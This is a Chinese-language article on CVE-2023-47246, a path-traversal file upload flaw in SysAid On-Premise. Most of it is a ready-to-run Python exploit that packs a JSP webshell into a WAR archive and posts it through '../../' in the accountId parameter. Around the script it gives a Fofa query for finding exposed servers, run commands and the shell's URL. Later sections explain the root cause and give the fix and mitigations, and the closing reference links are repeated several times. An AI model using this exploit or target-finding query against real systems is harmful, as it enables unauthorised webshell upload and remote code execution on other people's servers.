CVE-2023-47246 SysAid Server文件上传漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2023-47246是SysAid On-Premise软件中存在的一个任意文件上传漏洞。SysAid On-Premise是一种IT服务管理(ITSM)和IT资产管理(ITAM)解决方案，为企业提供全面的IT管理服务。该漏洞允许攻击者通过上传webshell获取目标系统权限。<\/p>

受影响版本<\/h3>

影响版本：version < 23.3.36<\/li>

厂商官网：https:\/\/www.sysaid.com\/<\/li> <\/ul>

漏洞影响<\/h2>

该漏洞影响所有运行SysAid On-Premise且版本低于23.3.36的系统。攻击者可以利用此漏洞：<\/p>

上传任意文件到服务器<\/li>
通过上传webshell获取系统控制权<\/li>

实现远程代码执行(RCE)<\/li> <\/ol>

漏洞环境识别<\/h2>

可以使用以下Fofa查询语句识别潜在受影响系统：<\/p>

body="sysaid-logo-dark-green.png"
<\/code><\/pre>
漏洞利用<\/h2>
利用工具准备<\/h3>
Python利用脚本如下：<\/p>
import<\/span> argparse
<\/span><\/span>import<\/span> binascii
<\/span><\/span>import<\/span> random
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> zipfile
<\/span><\/span>import<\/span> zlib
<\/span><\/span>import<\/span> urllib3
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>urllib3.<\/span>disable_warnings()
<\/span><\/span>
<\/span><\/span>def<\/span> compressFile<\/span>(shellFile, warFile):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        with<\/span> zipfile.<\/span>ZipFile(warFile, 'w'<\/span>, zipfile.<\/span>ZIP_DEFLATED) as<\/span> zipf:
<\/span><\/span>            zipf.<\/span>write(shellFile)
<\/span><\/span>        zipf.<\/span>close()
<\/span><\/span>        return<\/span> True<\/span>
<\/span><\/span>    except<\/span>:
<\/span><\/span>        return<\/span> False<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> getHexData<\/span>(warFile):
<\/span><\/span>    with<\/span> open(warFile, 'rb'<\/span>) as<\/span> warfile:
<\/span><\/span>        data =<\/span> warfile.<\/span>read()
<\/span><\/span>    warfile.<\/span>close()
<\/span><\/span>    compressed_data =<\/span> zlib.<\/span>compress(data)
<\/span><\/span>    hex_data =<\/span> binascii.<\/span>hexlify(compressed_data).<\/span>decode()
<\/span><\/span>    return<\/span> hex_data
<\/span><\/span>
<\/span><\/span>def<\/span> generateRandomDirectoryName<\/span>(num):
<\/span><\/span>    charset =<\/span> 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'<\/span>
<\/span><\/span>    return<\/span> ''<\/span>.<\/span>join(random.<\/span>choice(charset) for<\/span> _ in<\/span> range(num))
<\/span><\/span>
<\/span><\/span>def<\/span> get_random_agent<\/span>():
<\/span><\/span>    agent_list =<\/span> [
<\/span><\/span>        'Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/52.0.2743.116 Safari\/537.36'<\/span>,
<\/span><\/span>        'Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/53.0.2785.89 Safari\/537.36'<\/span>
<\/span><\/span>    ]
<\/span><\/span>    return<\/span> agent_list[random.<\/span>randint(0<\/span>, len(agent_list) -<\/span> 1<\/span>)]
<\/span><\/span>
<\/span><\/span>def<\/span> shellUpload<\/span>(url, proxy, directoryName, shellFile):
<\/span><\/span>    userEntryUrl =<\/span> f<\/span>"<\/span>{<\/span>url}<\/span>\/userentry?accountId=\/..\/..\/..\/tomcat\/webapps\/<\/span>{<\/span>directoryName}<\/span>\/&symbolName=test&base64UserName=YWRtaW4="<\/span>
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        "Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span>,
<\/span><\/span>        "User-Agent"<\/span>: get_random_agent()
<\/span><\/span>    }
<\/span><\/span>    shellFileName =<\/span> shellFile.<\/span>split("."<\/span>)[0<\/span>]
<\/span><\/span>    warFile =<\/span> f<\/span>"<\/span>{<\/span>shellFileName}<\/span>.war"<\/span>
<\/span><\/span>    if<\/span> compressFile(shellFile, warFile):
<\/span><\/span>        shellHex =<\/span> getHexData(warFile=<\/span>warFile)
<\/span><\/span>        data =<\/span> binascii.<\/span>unhexlify(shellHex)
<\/span><\/span>        resp =<\/span> requests.<\/span>post(url=<\/span>userEntryUrl, headers=<\/span>headers, data=<\/span>data, proxies=<\/span>proxy, verify=<\/span>False<\/span>)
<\/span><\/span>        print("<\/span>\033<\/span>[92m[+] Shell file compressed successfully!<\/span>\033<\/span>[0m"<\/span>)
<\/span><\/span>        return<\/span> resp
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print("<\/span>\033<\/span>[91m[x] Shell file compression failed.<\/span>\033<\/span>[0m"<\/span>)
<\/span><\/span>        exit(0<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> shellTest<\/span>(url, proxy, directoryName, shellFile):
<\/span><\/span>    userEntryUrl =<\/span> f<\/span>"<\/span>{<\/span>url}<\/span>\/<\/span>{<\/span>directoryName}<\/span>\/<\/span>{<\/span>shellFile}<\/span>"<\/span>
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        "User-Agent"<\/span>: get_random_agent()
<\/span><\/span>    }
<\/span><\/span>    resp =<\/span> requests.<\/span>get(url=<\/span>userEntryUrl, headers=<\/span>headers, timeout=<\/span>15<\/span>, proxies=<\/span>proxy, verify=<\/span>False<\/span>)
<\/span><\/span>    return<\/span> resp, userEntryUrl
<\/span><\/span>
<\/span><\/span>def<\/span> exploit<\/span>(url, proxy, shellFile):
<\/span><\/span>    print(f<\/span>"<\/span>\033<\/span>[94m[*] start to attack: <\/span>{<\/span>url}<\/span>\033<\/span>[0m"<\/span>)
<\/span><\/span>    directoryName =<\/span> generateRandomDirectoryName(5<\/span>)
<\/span><\/span>    userentryResp =<\/span> shellUpload(url, proxy, directoryName, shellFile)
<\/span><\/span>    print(f<\/span>"<\/span>\033<\/span>[94m[*] Wait 9 seconds...<\/span>\033<\/span>[0m"<\/span>)
<\/span><\/span>    time.<\/span>sleep(9<\/span>)
<\/span><\/span>    cveTestResp, userEntryUrl =<\/span> shellTest(url, proxy, directoryName, shellFile)
<\/span><\/span>    if<\/span> userentryResp.<\/span>status_code ==<\/span> 200<\/span> and<\/span> cveTestResp.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>        print(f<\/span>"<\/span>\033<\/span>[92m[+] The website [<\/span>{<\/span>url}<\/span>] has vulnerability CVE-2023-47246! Shell path: <\/span>{<\/span>userEntryUrl}<\/span>\033<\/span>[0m"<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print(f<\/span>"<\/span>\033<\/span>[91m[x] The website [<\/span>{<\/span>url}<\/span>] has no vulnerability CVE-2023-47246.<\/span>\033<\/span>[0m"<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    parser =<\/span> argparse.<\/span>ArgumentParser(description=<\/span>"SysAid Server remote code execution vulnerability CVE-2023-47246"<\/span>,
<\/span><\/span>        add_help=<\/span>"eg: python CVE-2023-47246-RCE.py -u https:\/\/192.168.149.150:8443"<\/span>)
<\/span><\/span>    parser.<\/span>add_argument("-u"<\/span>, "--url"<\/span>, help=<\/span>"target URL"<\/span>)
<\/span><\/span>    parser.<\/span>add_argument("-p"<\/span>, "--proxy"<\/span>, help=<\/span>"proxy, eg: http:\/\/127.0.0.1:7890"<\/span>)
<\/span><\/span>    parser.<\/span>add_argument("-f"<\/span>, "--file"<\/span>, help=<\/span>"shell file, eg: shell.jsp"<\/span>)
<\/span><\/span>    args =<\/span> parser.<\/span>parse_args()
<\/span><\/span>    if<\/span> args.<\/span>url.<\/span>endswith("\/"<\/span>):
<\/span><\/span>        url =<\/span> args.<\/span>url[:-<\/span>1<\/span>]
<\/span><\/span>    else<\/span>:
<\/span><\/span>        url =<\/span> args.<\/span>url
<\/span><\/span>    if<\/span> args.<\/span>proxy:
<\/span><\/span>        proxy =<\/span> {
<\/span><\/span>            'http'<\/span>: args.<\/span>proxy,
<\/span><\/span>            'https'<\/span>: args.<\/span>proxy
<\/span><\/span>        }
<\/span><\/span>    else<\/span>:
<\/span><\/span>        proxy =<\/span> {}
<\/span><\/span>    exploit(url, proxy, args.<\/span>file)
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

准备一个简单的JSP webshell文件，例如2.jsp<\/code>，内容为：<\/li>
<\/ol>
hello<%=8*8%>
<\/code><\/pre>

运行利用脚本：<\/li>
<\/ol>
python CVE-2023-47246-EXP.py -u http:\/\/host:8080 -p http:\/\/127.0.0.1:8088 -f 2.jsp
<\/span><\/span><\/code><\/pre>
脚本执行成功后，会生成一个随机目录名（如6YY7Y<\/code>），webshell的访问路径为：<\/li>
<\/ol>
http:\/\/domain\/6YY7Y\/2.jsp
<\/code><\/pre>
漏洞分析<\/h2>
漏洞位于com.ilient.server.UserEntry<\/code>类的doPost()<\/code>方法中：<\/p>

攻击者通过POST请求向\/userentry<\/code>端点发送数据<\/li>
服务器读取POST数据内容<\/li>
根据accountId<\/code>参数构建File对象，该参数未做路径限制，允许目录穿越<\/li>
服务器将POST数据写入zip文件<\/li>
调用a(var31, var11)<\/code>方法对zip文件进行解压<\/li>
<\/ol>
关键问题：<\/p>

accountId<\/code>参数未做安全过滤，允许..\/..\/..\/<\/code>这样的路径穿越<\/li>
上传的文件内容未做验证，允许任意文件上传<\/li>
上传后自动解压zip文件，导致任意文件写入<\/li>
<\/ul>
漏洞修复<\/h2>
官方已在23.3.36版本中修复此漏洞，建议：<\/p>

立即升级到最新版本（23.3.36或更高）<\/li>
下载地址：https:\/\/documentation.sysaid.com\/docs\/latest-version-installation-files<\/li>
官方安全公告：https:\/\/www.sysaid.com\/blog\/service-desk\/on-premise-software-security-vulnerability-notification<\/li>
<\/ol>
缓解措施<\/h2>
如果无法立即升级，可考虑以下临时缓解措施：<\/p>

限制对\/userentry<\/code>端点的访问<\/li>
监控服务器上异常的文件创建<\/li>
检查webapps目录下是否有可疑文件<\/li>
<\/ol>
参考链接<\/h2>

官方安全公告：https:\/\/www.sysaid.com\/blog\/service-desk\/on-premise-software-security-vulnerability-notification<\/li>
漏洞利用代码：https:\/\/github.com\/W01fh4cker\/CVE-2023-47246<\/li>
<\/ol>

CVE-2023-47246 SysAid Server文件上传漏洞分析与利用指南<\/h1>

漏洞利用<\/h2>

参考链接<\/h2> 官方安全公告：https:\/\/www.sysaid.com\/blog\/service-desk\/on-premise-software-security-vulnerability-notification<\/li> 漏洞利用代码：https:\/\/github.com\/W01fh4cker\/CVE-2023-47246<\/li> <\/ol>

参考链接<\/h2>

官方安全公告：https:\/\/www.sysaid.com\/blog\/service-desk\/on-premise-software-security-vulnerability-notification<\/li>
漏洞利用代码：https:\/\/github.com\/W01fh4cker\/CVE-2023-47246<\/li> <\/ol>